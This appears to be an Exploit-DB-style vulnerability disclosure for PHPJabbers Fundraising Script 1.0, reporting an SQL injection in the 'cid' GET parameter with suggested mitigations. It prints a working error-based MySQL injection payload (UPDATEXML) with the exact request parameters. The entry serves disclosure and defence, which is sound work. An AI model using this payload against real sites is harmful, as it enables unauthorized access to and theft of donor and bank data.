Fundraising Script-1.0 SQL Injection

vendor:

Fundraising Script

by:

nu11secur1ty

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Fundraising Script

Affected Version From: Fundraising Script-1.0

Affected Version To: Fundraising Script-1.0

Patch Exists: NO

Related CWE:

CPE: a:phpjabbers:fundraising_script:1.0

Metasploit:

Other Scripts:

Platforms Tested:

2023

Fundraising Script-1.0 SQL Injection

The 'cid' parameter in Fundraising Script-1.0 is vulnerable to SQL injection attacks. By submitting the payload ' as the cid parameter, a database error message was returned. If the database is not empty, this vulnerability could lead to unauthorized access to sensitive information such as donor's money and bank account details.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

## Title: Fundraising Script-1.0 SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `cid` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the cid parameter, and a database error
message was returned.
The database is empty, but if it is not, this will be over for the
money of the donors and their bank accounts!
The attacker can steal all information from the database!

[+]Payload:
mysql

Parameter: cid (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
(ELT(1741=1741,1))),0x7162787171),3873))

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>